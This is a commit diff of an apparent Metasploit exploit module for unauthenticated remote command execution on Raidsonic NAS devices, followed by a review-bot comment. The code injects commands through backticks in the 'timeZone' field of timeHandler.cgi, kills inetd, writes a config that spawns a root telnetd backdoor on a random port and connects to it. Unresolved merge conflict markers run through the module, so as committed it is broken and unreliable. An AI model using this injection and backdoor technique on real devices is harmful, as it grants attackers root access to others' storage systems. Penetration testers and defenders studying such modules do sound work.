Merge branch 'raidsonic_telnet' of https://github.com/jvazquez-r7/metasploit-framework into raidsonic-ib5220-exec
Conflicts: modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb
bug/bundler_fix
commit
9ae977ec80
@ -14,6 +14,8 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Auxiliary::CommandShell
include Msf::Exploit::FileDropper
RESPONSE_PATTERN = "\<FORM\ NAME\=\"form\"\ METHOD\=\"POST\"\ ACTION\=\"\/cgi\/time\/time.cgi\"\ ENCTYPE\=\"multipart\/form-data"
def initialize(info = {})
super(update_info(info,
'Name' => 'Raidsonic NAS Devices Unauthenticated Remote Command Execution',
@ -22,8 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote
interface. The vulnerability exists in timeHandler.cgi, which is accessible without
authentication. This module has been tested with the versions IB-NAS5220 and
IB-NAS4220.
Two target are included, first to start a telnetd service and establish a session over
it and second to run commands via the CMD target.
},
'Author' =>
[
@ -76,17 +76,24 @@ class Metasploit3 < Msf::Exploit::Remote
def banner_timeout
(datastore['TelnetBannerTimeout'] || 25).to_i
<<<<<<< HEAD
end
def exploit
@response_pattern = "\<FORM\ NAME\=\"form\"\ METHOD\=\"POST\"\ ACTION\=\"\/cgi\/time\/time.cgi\"\ ENCTYPE\=\"multipart\/form-data"
exploit_telnet
=======
>>>>>>> 7a8bafd82c22d31d2749c82502eaac8a89ea0db2
end
def exploit_telnet
telnetport = rand(65535)
def exploit
telnet_port = rand(65535)
<<<<<<< HEAD
print_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
=======
print_status("#{rhost}:#{rport} - Telnet port: #{telnet_port}")
>>>>>>> 7a8bafd82c22d31d2749c82502eaac8a89ea0db2
#first request
cmd = "killall inetd"
@ -95,20 +102,20 @@ class Metasploit3 < Msf::Exploit::Remote
res = request(cmd)
#no server header or something that we could use to get sure the command is executed
if (!res or res.code != 200 or res.body !~ /#{@response_pattern}/)
if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/)
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
end
#second request
inetd_cfg = rand_text_alpha(8)
cmd = "echo \"#{telnetport} stream tcp nowait root /usr/sbin/telnetd telnetd\" > /tmp/#{inetd_cfg}"
cmd = "echo \"#{telnet_port} stream tcp nowait root /usr/sbin/telnetd telnetd\" > /tmp/#{inetd_cfg}"
cmd = Rex::Text.uri_encode(cmd)
print_status("#{rhost}:#{rport} - sending second request - configure inetd")
register_file_for_cleanup("/tmp/#{inetd_cfg}")
res = request(cmd)
#no server header or something that we could use to get sure the command is executed
if (!res or res.code != 200 or res.body !~ /#{@response_pattern}/)
if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/)
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
end
@ -119,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = request(cmd)
#no server header or something that we could use to get sure the command is executed
if (!res or res.code != 200 or res.body !~ /#{@response_pattern}/)
if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/)
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
end
@ -131,17 +138,22 @@ class Metasploit3 < Msf::Exploit::Remote
res = request(cmd)
#no server header or something that we could use to get sure the command is executed
if (!res or res.code != 200 or res.body !~ /#{@response_pattern}/)
if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/)
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
end
begin
print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
<<<<<<< HEAD
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
=======
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port.to_i })
>>>>>>> 7a8bafd82c22d31d2749c82502eaac8a89ea0db2
if sock.nil?
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
end
<<<<<<< HEAD
print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}"
auth_info = {
:host => rhost,
@ -153,6 +165,9 @@ class Metasploit3 < Msf::Exploit::Remote
:active => true
}
report_auth_info(auth_info)
=======
print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")
>>>>>>> 7a8bafd82c22d31d2749c82502eaac8a89ea0db2
prompt = negotiate_telnet(sock)
if prompt.nil?
sock.close
@ -161,8 +176,11 @@ class Metasploit3 < Msf::Exploit::Remote
print_good("#{rhost}:#{rport} - Telnet session successfully established...")
end
<<<<<<< HEAD
sock.put(user)
sock.put("\r\n")
=======
>>>>>>> 7a8bafd82c22d31d2749c82502eaac8a89ea0db2
handler(sock)
rescue
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
@ -181,19 +199,19 @@ class Metasploit3 < Msf::Exploit::Remote
#not working without setting encode_params to false!
'encode_params' => false,
'vars_post' => {
"month" => "#{rand(12)}",
"date" => "#{rand(30)}",
"year" => "20#{rand(99)}",
"hour" => "#{rand(12)}",
"minute" => "#{rand(60)}",
"ampm" => "PM",
"timeZone" => "Amsterdam`#{cmd}`",
"ntp_type" => "default",
"ntpServer" => "none",
"old_date" => " 1 12007",
"old_time" => "1210",
"month" => "#{rand(12)}",
"date" => "#{rand(30)}",
"year" => "20#{rand(99)}",
"hour" => "#{rand(12)}",
"minute" => "#{rand(60)}",
"ampm" => "PM",
"timeZone" => "Amsterdam`#{cmd}`",
"ntp_type" => "default",
"ntpServer" => "none",
"old_date" => " 1 12007",
"old_time" => "1210",
"old_timeZone" => "Amsterdam",
"renew" => "0"
"renew" => "0"
}
})
return res
@ -201,13 +219,30 @@ class Metasploit3 < Msf::Exploit::Remote
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice")
end
end
<<<<<<< HEAD
def negotiate_telnet(sock)
=======
def negotiate_telnet(sock)
login = read_telnet(sock, "login: $")
if login
sock.put("#{user}\r\n")
end
return read_telnet(sock, "> $")
end
def read_telnet(sock, pattern)
>>>>>>> 7a8bafd82c22d31d2749c82502eaac8a89ea0db2
begin
Timeout.timeout(banner_timeout) do
while(true)
data = sock.get_once(-1, tel_timeout)
return nil if not data or data.length == 0
<<<<<<< HEAD
if data =~ /login/
=======
if data =~ /#{pattern}/
>>>>>>> 7a8bafd82c22d31d2749c82502eaac8a89ea0db2
return true
end
end
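Review bot: The new side of this merge still contains unresolved conflict markers (`<<<<<<< HEAD`, `=======`, `>>>>>>> 7a8bafd82c22d31d2749c82502eaac8a89ea0db2`) in this hunk and in the earlier hunks around `banner_timeout`/`exploit`, the telnet connection block, and the `negotiate_telnet` definition, so the module as committed is not valid Ruby and will not load. Here the HEAD side keeps a bare `def negotiate_telnet(sock)` while the branch side introduces the `negotiate_telnet`/`read_telnet(sock, pattern)` split, and both `if data =~ /login/` and `if data =~ /#{pattern}/` survive, which cannot be correct at the same time. Each conflict needs to be settled to one variant; from the visible lines the branch side looks like the intended one, since the rest of the hunk is written against `read_telnet(sock, pattern)`, but that is an inference. The body of `read_telnet` continues past the end of the hunk.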